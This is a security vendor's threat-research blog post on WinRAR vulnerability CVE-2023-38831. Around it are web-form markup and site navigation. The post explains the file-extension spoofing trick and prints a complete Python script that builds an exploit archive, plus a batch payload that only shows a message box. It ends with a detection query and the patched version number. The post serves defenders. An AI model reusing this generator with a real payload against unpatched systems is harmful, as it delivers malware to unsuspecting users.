    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input id="email-464171ef-7766-4b86-9e48-f51bb13b325f_4495" name="email" required="" placeholder="" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
  </div>
  <div class="hs_phone hs-phone hs-fieldtype-phonenumber field hs-form-field" style="display: none;"><label id="label-phone-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Phone number"
      for="phone-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Phone number</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input name="phone" class="hs-input" type="hidden" value=""></div>
  </div>
  <div class="hs_company hs-company hs-fieldtype-text field hs-form-field"><label id="label-company-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Company name"
      for="company-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Company name</span><span class="hs-form-required">*</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input id="company-464171ef-7766-4b86-9e48-f51bb13b325f_4495" name="company" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="organization" value=""></div>
  </div>
  <div class="hs_how_did_you_hear_about_uptycs_ hs-how_did_you_hear_about_uptycs_ hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-how_did_you_hear_about_uptycs_-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class=""
      placeholder="Enter your How did you hear about Uptycs?" for="how_did_you_hear_about_uptycs_-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>How did you hear about Uptycs?</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input name="how_did_you_hear_about_uptycs_" class="hs-input" type="hidden" value=""></div>
  </div>
  <div class="hs_company_hq___state hs-company_hq___state hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-company_hq___state-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class=""
      placeholder="Enter your Company HQ - State" for="company_hq___state-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Company HQ - State</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input name="company_hq___state" class="hs-input" type="hidden" value=""></div>
  </div>
  <div class="hs_jobtitle hs-jobtitle hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-jobtitle-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Job title"
      for="jobtitle-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Job title</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input name="jobtitle" class="hs-input" type="hidden" value=""></div>
  </div>
  <div class="hs_numberofemployees hs-numberofemployees hs-fieldtype-number field hs-form-field" style="display: none;"><label id="label-numberofemployees-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Employees"
      for="numberofemployees-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Employees</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input name="numberofemployees" class="hs-input" type="hidden" value=""></div>
  </div>
  <div class="hs_became_an_mql_date hs-became_an_mql_date hs-fieldtype-date field hs-form-field" style="display: none;"><label id="label-became_an_mql_date-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class=""
      placeholder="Enter your Became an MQL date" for="became_an_mql_date-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Became an MQL date</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input name="became_an_mql_date" class="hs-input" type="hidden" value=""></div>
  </div>
  <div class="hs-dependent-field">
    <div class="hs_honeypot_queue hs-honeypot_queue hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-honeypot_queue-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your What color is the sky?"
        for="honeypot_queue-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>What color is the sky?</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input name="honeypot_queue" class="hs-input" type="hidden" value=""></div>
    </div>
  </div>
  <div class="hs_ld_bookit_log_id hs-ld_bookit_log_id hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-ld_bookit_log_id-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your LD BookIt Log ID"
      for="ld_bookit_log_id-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>LD BookIt Log ID</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input name="ld_bookit_log_id" class="hs-input" type="hidden" value=""></div>
  </div>
  <div class="hs_utm_source hs-utm_source hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_source-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your utm_source"
      for="utm_source-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>utm_source</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input name="utm_source" class="hs-input" type="hidden" value=""></div>
  </div>
  <div class="hs_utm_medium hs-utm_medium hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_medium-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your utm_medium"
      for="utm_medium-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>utm_medium</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input name="utm_medium" class="hs-input" type="hidden" value=""></div>
  </div>
  <div class="hs_utm_content hs-utm_content hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_content-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your utm_content"
      for="utm_content-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>utm_content</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input name="utm_content" class="hs-input" type="hidden" value=""></div>
  </div>
  <div class="hs_utm_campaign hs-utm_campaign hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_campaign-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your utm_campaign"
      for="utm_campaign-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>utm_campaign</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input name="utm_campaign" class="hs-input" type="hidden" value=""></div>
  </div>
  <div class="legal-consent-container">
    <div class="hs-richtext">
      <p>You can unsubscribe from Uptycs communications at any time. For information about how Uptycs handles your personal data, please see our <u><a href="https://www.uptycs.com/privacy" target="_blank">Privacy Policy</a></u>.</p>
    </div>
  </div>
  <div class="hs_submit hs-submit">
    <div class="hs-field-desc" style="display: none;"></div>
    <div class="actions"><input type="submit" class="hs-button primary large" value="Request a Demo"></div>
  </div><input name="hs_context" type="hidden"
    value="{&quot;embedAtTimestamp&quot;:&quot;1713298179628&quot;,&quot;formDefinitionUpdatedAt&quot;:&quot;1708973699207&quot;,&quot;lang&quot;:&quot;en&quot;,&quot;legalConsentOptions&quot;:&quot;{\&quot;legitimateInterestSubscriptionTypes\&quot;:[3136631],\&quot;communicationConsentCheckboxes\&quot;:[{\&quot;communicationTypeId\&quot;:3136631,\&quot;label\&quot;:\&quot;I agree to receive other communications from Uptycs.\&quot;,\&quot;required\&quot;:false}],\&quot;legitimateInterestLegalBasis\&quot;:\&quot;LEGITIMATE_INTEREST_PQL\&quot;,\&quot;communicationConsentText\&quot;:\&quot;Uptycs is committed to protecting and respecting your privacy, and we’ll only use your personal information to administer your account and to provide the products and services you requested from us. From time to time, we would like to contact you about our products and services, as well as other content that may be of interest to you. If you consent to us contacting you for this purpose, please tick below to say how you would like us to contact you:\&quot;,\&quot;processingConsentType\&quot;:\&quot;IMPLICIT\&quot;,\&quot;processingConsentText\&quot;:\&quot;In order to provide you the content requested, we need to store and process your personal data. If you consent to us storing your personal data for this purpose, please tick the checkbox below.\&quot;,\&quot;processingConsentCheckboxLabel\&quot;:\&quot;I agree to allow Uptycs to store and process my personal data.\&quot;,\&quot;privacyPolicyText\&quot;:\&quot;<p>You can unsubscribe from Uptycs communications at any time. For information about how Uptycs handles your personal data, please see our <u><a href=\\\&quot;https://www.uptycs.com/privacy\\\&quot; target=\\\&quot;_blank\\\&quot;>Privacy Policy</a></u>.</p>\&quot;,\&quot;isLegitimateInterest\&quot;:true}&quot;,&quot;embedType&quot;:&quot;REGULAR&quot;,&quot;clonedFromForm&quot;:&quot;9f3fffac-7d79-4a57-ac39-94b68261d59a&quot;,&quot;notifyHubSpotOwner&quot;:&quot;true&quot;,&quot;renderRawHtml&quot;:&quot;true&quot;,&quot;userAgent&quot;:&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36&quot;,&quot;pageTitle&quot;:&quot;WinRAR Vulnerability Exploitation: Decode &amp; Bolster Protection&quot;,&quot;pageUrl&quot;:&quot;https://www.uptycs.com/blog/winrar-vulnerability-exploitation&quot;,&quot;pageId&quot;:&quot;133806526071&quot;,&quot;isHubSpotCmsGeneratedPage&quot;:true,&quot;canonicalUrl&quot;:&quot;https://www.uptycs.com/blog/winrar-vulnerability-exploitation&quot;,&quot;contentType&quot;:&quot;blog-post&quot;,&quot;hutk&quot;:&quot;bebd24343e2ed718561e5a8f320fe293&quot;,&quot;__hsfp&quot;:726726051,&quot;__hssc&quot;:&quot;26386402.1.1713298181281&quot;,&quot;__hstc&quot;:&quot;26386402.bebd24343e2ed718561e5a8f320fe293.1713298181281.1713298181281.1713298181281.1&quot;,&quot;formTarget&quot;:&quot;#hs_form_target_form_134294284&quot;,&quot;formInstanceId&quot;:&quot;4495&quot;,&quot;rawInlineMessage&quot;:&quot;<div style=\&quot;text-align: center;\&quot;>\n<div aria-setsize=\&quot;-1\&quot; id=\&quot;1701201608.413599\&quot; data-qa=\&quot;virtual-list-item\&quot; data-item-key=\&quot;1701201608.413599\&quot; tabindex=\&quot;0\&quot; role=\&quot;listitem\&quot;>\n<div data-qa=\&quot;message_container\&quot; data-qa-unprocessed=\&quot;false\&quot; data-qa-placeholder=\&quot;false\&quot; role=\&quot;presentation\&quot;>\n<div data-qa-hover=\&quot;true\&quot; role=\&quot;document\&quot; aria-roledescription=\&quot;message\&quot;>\n<div>\n<div>\n<div data-qa=\&quot;message_content\&quot; role=\&quot;presentation\&quot;>\n<div>\n<div data-qa=\&quot;message-text\&quot;>\n<div data-qa=\&quot;block-kit-renderer\&quot;>\n<div>\n<div dir=\&quot;auto\&quot;>\n<div style=\&quot;font-size: 18px;\&quot;><span style=\&quot;color: #ffffff;\&quot;>Great! Well get back to you soon.</span></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div aria-setsize=\&quot;-1\&quot; id=\&quot;1701201665.858649\&quot; data-qa=\&quot;virtual-list-item\&quot; data-item-key=\&quot;1701201665.858649\&quot; tabindex=\&quot;-1\&quot; role=\&quot;listitem\&quot;>\n<div data-qa=\&quot;message_container\&quot; data-qa-unprocessed=\&quot;false\&quot; data-qa-placeholder=\&quot;false\&quot; role=\&quot;presentation\&quot;>\n<div data-qa-hover=\&quot;true\&quot; role=\&quot;document\&quot; aria-roledescription=\&quot;message\&quot;>\n<div data-stringify-ignore=\&quot;true\&quot; style=\&quot;font-size: 18px;\&quot; role=\&quot;presentation\&quot;>&amp;nbsp;</div>\n</div>\n</div>\n</div>\n</div>&quot;,&quot;hsFormKey&quot;:&quot;5b517c9b8f80019bee1c3f2daa44d80e&quot;,&quot;pageName&quot;:&quot;WinRAR Vulnerability Exploitation: Decode &amp; Bolster Protection&quot;,&quot;dateFields&quot;:&quot;became_an_mql_date&quot;,&quot;rumScriptExecuteTime&quot;:1339.6999969482422,&quot;rumTotalRequestTime&quot;:1746.599998474121,&quot;rumTotalRenderTime&quot;:1985.1999969482422,&quot;rumServiceResponseTime&quot;:406.9000015258789,&quot;rumFormRenderTime&quot;:238.5999984741211,&quot;connectionType&quot;:&quot;4g&quot;,&quot;firstContentfulPaint&quot;:0,&quot;largestContentfulPaint&quot;:0,&quot;locale&quot;:&quot;en&quot;,&quot;timestamp&quot;:1713298181295,&quot;originalEmbedContext&quot;:{&quot;portalId&quot;:&quot;2617658&quot;,&quot;formId&quot;:&quot;464171ef-7766-4b86-9e48-f51bb13b325f&quot;,&quot;region&quot;:&quot;na1&quot;,&quot;target&quot;:&quot;#hs_form_target_form_134294284&quot;,&quot;isBuilder&quot;:false,&quot;isTestPage&quot;:false,&quot;isPreview&quot;:false,&quot;formInstanceId&quot;:&quot;4495&quot;,&quot;formsBaseUrl&quot;:&quot;/_hcms/forms&quot;,&quot;css&quot;:&quot;&quot;,&quot;inlineMessage&quot;:&quot;<div style=\&quot;text-align: center;\&quot;>\n<div aria-setsize=\&quot;-1\&quot; id=\&quot;1701201608.413599\&quot; data-qa=\&quot;virtual-list-item\&quot; data-item-key=\&quot;1701201608.413599\&quot; tabindex=\&quot;0\&quot; role=\&quot;listitem\&quot;>\n<div data-qa=\&quot;message_container\&quot; data-qa-unprocessed=\&quot;false\&quot; data-qa-placeholder=\&quot;false\&quot; role=\&quot;presentation\&quot;>\n<div data-qa-hover=\&quot;true\&quot; role=\&quot;document\&quot; aria-roledescription=\&quot;message\&quot;>\n<div>\n<div>\n<div data-qa=\&quot;message_content\&quot; role=\&quot;presentation\&quot;>\n<div>\n<div data-qa=\&quot;message-text\&quot;>\n<div data-qa=\&quot;block-kit-renderer\&quot;>\n<div>\n<div dir=\&quot;auto\&quot;>\n<div style=\&quot;font-size: 18px;\&quot;><span style=\&quot;color: #ffffff;\&quot;>Great! Well get back to you soon.</span></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div aria-setsize=\&quot;-1\&quot; id=\&quot;1701201665.858649\&quot; data-qa=\&quot;virtual-list-item\&quot; data-item-key=\&quot;1701201665.858649\&quot; tabindex=\&quot;-1\&quot; role=\&quot;listitem\&quot;>\n<div data-qa=\&quot;message_container\&quot; data-qa-unprocessed=\&quot;false\&quot; data-qa-placeholder=\&quot;false\&quot; role=\&quot;presentation\&quot;>\n<div data-qa-hover=\&quot;true\&quot; role=\&quot;document\&quot; aria-roledescription=\&quot;message\&quot;>\n<div data-stringify-ignore=\&quot;true\&quot; style=\&quot;font-size: 18px;\&quot; role=\&quot;presentation\&quot;>&amp;nbsp;</div>\n</div>\n</div>\n</div>\n</div>&quot;,&quot;isMobileResponsive&quot;:true,&quot;rawInlineMessage&quot;:&quot;<div style=\&quot;text-align: center;\&quot;>\n<div aria-setsize=\&quot;-1\&quot; id=\&quot;1701201608.413599\&quot; data-qa=\&quot;virtual-list-item\&quot; data-item-key=\&quot;1701201608.413599\&quot; tabindex=\&quot;0\&quot; role=\&quot;listitem\&quot;>\n<div data-qa=\&quot;message_container\&quot; data-qa-unprocessed=\&quot;false\&quot; data-qa-placeholder=\&quot;false\&quot; role=\&quot;presentation\&quot;>\n<div data-qa-hover=\&quot;true\&quot; role=\&quot;document\&quot; aria-roledescription=\&quot;message\&quot;>\n<div>\n<div>\n<div data-qa=\&quot;message_content\&quot; role=\&quot;presentation\&quot;>\n<div>\n<div data-qa=\&quot;message-text\&quot;>\n<div data-qa=\&quot;block-kit-renderer\&quot;>\n<div>\n<div dir=\&quot;auto\&quot;>\n<div style=\&quot;font-size: 18px;\&quot;><span style=\&quot;color: #ffffff;\&quot;>Great! Well get back to you soon.</span></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div aria-setsize=\&quot;-1\&quot; id=\&quot;1701201665.858649\&quot; data-qa=\&quot;virtual-list-item\&quot; data-item-key=\&quot;1701201665.858649\&quot; tabindex=\&quot;-1\&quot; role=\&quot;listitem\&quot;>\n<div data-qa=\&quot;message_container\&quot; data-qa-unprocessed=\&quot;false\&quot; data-qa-placeholder=\&quot;false\&quot; role=\&quot;presentation\&quot;>\n<div data-qa-hover=\&quot;true\&quot; role=\&quot;document\&quot; aria-roledescription=\&quot;message\&quot;>\n<div data-stringify-ignore=\&quot;true\&quot; style=\&quot;font-size: 18px;\&quot; role=\&quot;presentation\&quot;>&amp;nbsp;</div>\n</div>\n</div>\n</div>\n</div>&quot;,&quot;hsFormKey&quot;:&quot;5b517c9b8f80019bee1c3f2daa44d80e&quot;,&quot;pageName&quot;:&quot;WinRAR Vulnerability Exploitation: Decode &amp; Bolster Protection&quot;,&quot;pageId&quot;:&quot;133806526071&quot;,&quot;contentType&quot;:&quot;blog-post&quot;,&quot;formData&quot;:{&quot;cssClass&quot;:&quot;hs-form stacked hs-custom-form&quot;},&quot;isCMSModuleEmbed&quot;:true},&quot;correlationId&quot;:&quot;3b848806-0722-4949-a72e-4881906c88f1&quot;,&quot;renderedFieldsIds&quot;:[&quot;firstname&quot;,&quot;lastname&quot;,&quot;email&quot;,&quot;phone&quot;,&quot;company&quot;,&quot;how_did_you_hear_about_uptycs_&quot;,&quot;company_hq___state&quot;,&quot;jobtitle&quot;,&quot;numberofemployees&quot;,&quot;became_an_mql_date&quot;,&quot;honeypot_queue&quot;,&quot;ld_bookit_log_id&quot;,&quot;utm_source&quot;,&quot;utm_medium&quot;,&quot;utm_content&quot;,&quot;utm_campaign&quot;],&quot;captchaStatus&quot;:&quot;NOT_APPLICABLE&quot;,&quot;emailResubscribeStatus&quot;:&quot;NOT_APPLICABLE&quot;,&quot;isInsideCrossOriginFrame&quot;:false,&quot;source&quot;:&quot;forms-embed-1.5064&quot;,&quot;sourceName&quot;:&quot;forms-embed&quot;,&quot;sourceVersion&quot;:&quot;1.5064&quot;,&quot;sourceVersionMajor&quot;:&quot;1&quot;,&quot;sourceVersionMinor&quot;:&quot;5064&quot;,&quot;allPageIds&quot;:{&quot;embedContextPageId&quot;:&quot;133806526071&quot;,&quot;analyticsPageId&quot;:&quot;133806526071&quot;,&quot;contentPageId&quot;:133806526071,&quot;contentAnalyticsPageId&quot;:&quot;133806526071&quot;},&quot;_debug_embedLogLines&quot;:[{&quot;clientTimestamp&quot;:1713298179893,&quot;level&quot;:&quot;INFO&quot;,&quot;message&quot;:&quot;Retrieved customer callbacks used on embed context: [\&quot;getExtraMetaDataBeforeSubmit\&quot;]&quot;},{&quot;clientTimestamp&quot;:1713298179894,&quot;level&quot;:&quot;INFO&quot;,&quot;message&quot;:&quot;Retrieved pageContext values which may be overriden by the embed context: {\&quot;pageTitle\&quot;:\&quot;WinRAR Vulnerability Exploitation: Decode &amp; Bolster Protection\&quot;,\&quot;pageUrl\&quot;:\&quot;https://www.uptycs.com/blog/winrar-vulnerability-exploitation\&quot;,\&quot;userAgent\&quot;:\&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36\&quot;,\&quot;pageId\&quot;:\&quot;133806526071\&quot;,\&quot;contentAnalyticsPageId\&quot;:\&quot;133806526071\&quot;,\&quot;contentPageId\&quot;:133806526071,\&quot;isHubSpotCmsGeneratedPage\&quot;:true}&quot;},{&quot;clientTimestamp&quot;:1713298179897,&quot;level&quot;:&quot;INFO&quot;,&quot;message&quot;:&quot;Retrieved countryCode property from normalized embed definition response: \&quot;DE\&quot;&quot;},{&quot;clientTimestamp&quot;:1713298181288,&quot;level&quot;:&quot;INFO&quot;,&quot;message&quot;:&quot;Retrieved analytics values from API response which may be overriden by the embed context: {\&quot;hutk\&quot;:\&quot;bebd24343e2ed718561e5a8f320fe293\&quot;,\&quot;canonicalUrl\&quot;:\&quot;https://www.uptycs.com/blog/winrar-vulnerability-exploitation\&quot;,\&quot;contentType\&quot;:\&quot;blog-post\&quot;,\&quot;pageId\&quot;:\&quot;133806526071\&quot;}&quot;}]}"><iframe
    name="target_iframe_464171ef-7766-4b86-9e48-f51bb13b325f_4495" style="display: none;"></iframe>
</form>

Text Content

×

This website stores cookies on your computer. These cookies are used to collect
information about how you interact with our website and allow us to remember
you. We use this information in order to improve and customize your browsing
experience and for analytics and metrics about our visitors both on this website
and other media. To find out more about the cookies we use, see our Privacy
Policy

If you decline, your information won’t be tracked when you visit this website. A
single cookie will be used in your browser to remember your preference not to be
tracked.

Accept Decline


 * Why Uptycs?
 * Products Show submenu for Products
   
   HYBRID CLOUD SECURITY PLATFORM
   
    * CNAPP Overview
    * Workload Protection (CWPP)
    * Container and K8s Security (KSPM)
    * Posture Management (CSPM)
    * Entitlement Management (CIEM)
    * Threat Detection and Response (CDR)
   
   ENDPOINT SECURITY
   
    * XDR Overview
    * Workspace and Workload Security
    * IBM Power, Linux on Z, LinuxONE, and AIX
    * Uptycs XDR vs. The Old Way

 * Solutions Show submenu for Solutions
   
   BY USE CASE
   
    * Compliance
    * Vulnerability Management
    * Detection and Response
    * Threat Hunting
    * Forensic Investigation
    * Managed Services (MDR)
   
   BY ENVIRONMENT
   
    * AWS
    * Azure
    * Google Cloud
    * IBM

 * Partners
 * Resources Show submenu for Resources
   
   RESOURCES
   
    * Resource Center
    * Customer Stories
    * Blog
    * Events and Webinars
    * Reviews
   
   COMMUNITY
   
    * osquery Community
    * osquery: what is it
    * Cybersecurity Standup
   
   FEATURED
   
   KuppingerCole positions Uptycs a CSPM Technology Leader

 * Company Show submenu for Company
    * Overview
    * Press and News
    * Contact Us
   
    * Support
    * Training
    * Careers
    * Security Practices

 * Why Uptycs?
 * Products Show submenu for Products
   
   HYBRID CLOUD SECURITY PLATFORM
   
    * CNAPP Overview
    * Workload Protection (CWPP)
    * Container and K8s Security (KSPM)
    * Posture Management (CSPM)
    * Entitlement Management (CIEM)
    * Threat Detection and Response (CDR)
   
   ENDPOINT SECURITY
   
    * XDR Overview
    * Workspace and Workload Security
    * IBM Power, Linux on Z, LinuxONE, and AIX
    * Uptycs XDR vs. The Old Way

 * Solutions Show submenu for Solutions
   
   BY USE CASE
   
    * Compliance
    * Vulnerability Management
    * Detection and Response
    * Threat Hunting
    * Forensic Investigation
    * Managed Services (MDR)
   
   BY ENVIRONMENT
   
    * AWS
    * Azure
    * Google Cloud
    * IBM

 * Partners
 * Resources Show submenu for Resources
   
   RESOURCES
   
    * Resource Center
    * Customer Stories
    * Blog
    * Events and Webinars
    * Reviews
   
   COMMUNITY
   
    * osquery Community
    * osquery: what is it
    * Cybersecurity Standup
   
   FEATURED
   
   KuppingerCole positions Uptycs a CSPM Technology Leader

 * Company Show submenu for Company
    * Overview
    * Press and News
    * Contact Us
   
    * Support
    * Training
    * Careers
    * Security Practices

Request a demo


INSIDE THE WINRAR VULNERABILITY: DECODING & BOLSTERING PROTECTION

Tags: Threats

UPTYCS THREAT RESEARCH

September 08, 2023
Share:
 * 
 * 
 * 
 * 



Authors:  Siddartha Malladi and Arpit Kataria

 

It’s been two weeks since researchers uncovered a high severity security flaw in
the WinRAR utility that cyber adversaries are using to exploit the trusted ZIP
archive format for malicious code execution. With active exploits currently
underway, organizations are urged to update their software.

The sheer ubiquity of WinRAR in corporate settings makes this vulnerability an
urgent concern. What sets this issue apart is its deceptive simplicity: an
attacker can mask malicious scripts within a ZIP file, misleading both users and
rudimentary security controls. Initial reports indicate that this technique has
been weaponized against specialized online communities like those focused on
cryptocurrency and stock trading.

Our deep-dive analysis offers not only a comprehensive understanding of the
vulnerability but also practical steps for detection and mitigation. This is
more than just another vulnerability explainer; consider it a comprehensive
guide for cybersecurity professionals who need to understand the 'how' and 'why'
behind CVE-2023-38831. Armed with this knowledge, you'll be better prepared to
thwart attackers aiming to exploit this vulnerability in your organization.

 


UNDERSTANDING THE WINRAR VULNERABILITY

 

The recently unveiled WinRAR vulnerability, tracked as CVE-2023-38831, poses a
unique challenge for cybersecurity professionals. This flaw disrupts WinRAR's
handling of file extensions, opening doors for unauthorized code execution. What
makes it particularly insidious is its ability to hide malicious executables
within seemingly benign files, such as .PDFs or .JPGs, in an archive.

Recent evidence indicates that threat actors are capitalizing on this
vulnerability to target cryptocurrency and stock trading communities, deploying
malicious payloads like DarkMe, GuLoader, and Remcos RAT. These exploits have
been on the rise from April to August 2023, magnifying the urgency for effective
mitigation strategies among security teams.

 


CVE-2023-38831: TECHNICAL INSIGHTS

Cybercriminals are exploiting a security loophole in WinRAR that enables file
extension spoofing. This deceptive technique enables them to embed malicious
code in an archive disguised as a benign ".jpg", ".txt", or other commonly
recognized file types. They package both benign and malicious files within a
single ZIP archive. When victims open this malicious package, they see what
seems like an image file and a folder with the same name as the image.

 

Figure1 – Exploitation flow of CVE-2023-38831

 

Figure 2 – Malicious RAR file

 

This RAR contains image.jpg file and image.jpg folder. The image.jpg file is a
decoy file and the image.jpg folder acts as script carrier. The folder houses a
script set to execute upon the opening of the decoy file.

 



Figure 3 – Victim opening image.jpg file

 

 

In this demonstration, clicking on the image.jpg file opens not only a decoy
image but also executes a script. This script triggers a dialog box that
displays the message "Exploited CVE-2023-38831". 

Note that this is merely a demonstration. In a real-world scenario, a threat
actor could design the script to display an image while clandestinely running a
script to download malware in the background. 



 


EXPLOITATION MECHANICS

Now let’s dive into the details of how the exploitation works

 

 * Within the ZIP archive, a file with the name “image.jpg” exists; however, a
   trailing space is intentionally added, making it “image.jpg ”. 

 

 * Inside the ZIP archive, there's a folder "image.jpg " that has a file inside.
   This file contains malicious code, such as a script designed to download
   malware. This file has the same name as the tricky file above, but with extra
   stuff at the end, like "image.jpg .cmd ". Importantly, the trailing space is
   intentionally included as part of the filename. 

 

 * When an application like WinRAR processes the ZIP archive, it encounters the
   deceptive “image.jpg “ file and fails to properly handle the trailing space,
   leading to the vulnerability. 

 

 * Due to this improper handling, WinRAR executes unintended actions. It follows
   the instructions in the tricky file ("image.jpg .cmd ") without realizing
   it's bad. These instructions make the computer run a program that it
   shouldn't. Note: The exploit is only triggered if the victim both opens the
   RAR archive and accesses the image file specifically within WinRAR.  

Once the victim clicks on the image.jpg file, WinRAR triggers the following
command:  cmd.exe /c
C:\Users\<user>\AppData\Local\Temp\Rar$DIa6116.27667\image.jpg .cmd.

 

Figure 4 – Inside image.jpg folder

 

To execute the previously outlined attack vector, we can utilize the following
Python exploit script coupled with a batch payload script.

 

Exploit Script:

 

import shutil

import os

import sys

from os.path import join

 

def generate_exploit(folder_name, decoy_filename, payload_filename,
output_filename):  

    decoy_ext = os.path.splitext(decoy_filename)[1].encode("utf-8")

    if os.path.exists(folder_name):

        shutil.rmtree(folder_name)

    os.mkdir(folder_name)

    sub_dir = join(folder_name, decoy_filename + "1")

    if not os.path.exists(sub_dir):

        os.mkdir(sub_dir)

 

    shutil.copyfile(join(payload_filename), join(sub_dir,
decoy_filename+"1.cmd"))

    shutil.copyfile(join(decoy_filename), join(folder_name, decoy_filename+"2"))

 

    shutil.make_archive(folder_name, 'zip', folder_name)

 

    with open(folder_name + ".zip", "rb") as f:

        content = f.read()

        content = content.replace(decoy_ext + b"1", decoy_ext + b" ")

        content = content.replace(decoy_ext + b"2", decoy_ext + b" ")

 

    os.remove(folder_name + ".zip")

 

    with open(output_filename, "wb")  as f:

        f.write(content)

 

    print("Exploit generated successfully:", output_filename)





def main():

    if len(sys.argv) < 4:

        print("""Usage:

              python .\exploit.py <decoy_filename> <payload_filename>
<output_filename>""")

    else:

        if len(sys.argv) != 4:

            print("Invalid number of parameters.")

        else:

            folder_name = "Malicious_file"

            decoy_filename = os.path.basename(sys.argv[1])

            payload_filename = os.path.basename(sys.argv[2])

            output_filename = os.path.basename(sys.argv[3])

            generate_exploit(folder_name, decoy_filename, payload_filename,
output_filename)






if __name__ == "__main__":

    main()

 

Payload script:

 

echo x=msgbox("        Exploited the CVE-2023-38831        " ,0, "WinRAR") >>
msgbox.vbs &

start msgbox.vbs &

image.jpg





Save the Python script as exploit.py and batch file as payload.bat.
Additionally, place an image file renamed to image.jpg in the same folder. Now
run the following command in order to generate a malicious RAR file:

 

python .\exploit.py image.jpg payload.bat poc.rar

 

The Python script employs several tactics. Firstly, it creates a directory named
"Malicious_file," into which it places a duplicate of the image file, now
renamed to "image.jpg1". It also generates a sub-directory, "image.jpg2" which
houses a hidden payload named "image.jpg .cmd." The script then compresses these
contents into a ZIP archive. In the final step, it subtly modifies the file
names by replacing numerical suffixes with trailing spaces, exploiting the
vulnerability.

 


DETECTION THROUGH UPTYCS XDR

Should your system have a vulnerable version of WinRAR, Uptycs XDR offers robust
vulnerability scanning features for timely detection. Uptycs XDR stores
vulnerability scan results in a dedicated table, accessible via SQL queries, as
shown below: 

 

select cve_list, package_name, package_version, cvss_score, os from
vulnerabilities where cve_list = 'CVE-2023-38831'

 

Figure 5 – Detection of CVE-2023-38831 using vulnerability scan

 

To remediate this issue, RARlab has issued WinRAR version 6.23; all preceding
versions remain vulnerable.

 

Figure 6 – Detection of exploitation of the vulnerability

 


CONCLUSION

In summary, the CVE-2023-38831 vulnerability in WinRAR underscores the
increasingly sophisticated tactics employed by cybercriminals. By exploiting
file extension spoofing, they are able to embed malicious code within seemingly
benign files.  This serves as a cautionary tale for security teams, particularly
those protecting environments where sensitive financial transactions occur, such
as trading platforms. 

As threat actors evolve their techniques, it becomes increasingly imperative for
cybersecurity professionals to maintain up-to-date software, implement robust
security measures, and foster a culture of cybersecurity awareness within their
organizations.

 

RECOMMENDED CONTENT

MASTERING CLOUD SECURITY: THE SERIES

Read More

MASTERING KUBERNETES SECURITY: THE SERIES

Read More

THE CISO PLAYBOOK: SECURITY, COMPLIANCE & EFFICIENCY

Read More

SIGN UP FOR A DEMO





SIGN UP HERE:

First name*

Last name*

Work Email*

Phone number

Company name*

My security priority is:

How did you hear about us?

Company HQ - State

Job title

Employees

Became an MQL date

What color is the sky?

LD BookIt Log ID

utm_source

utm_medium

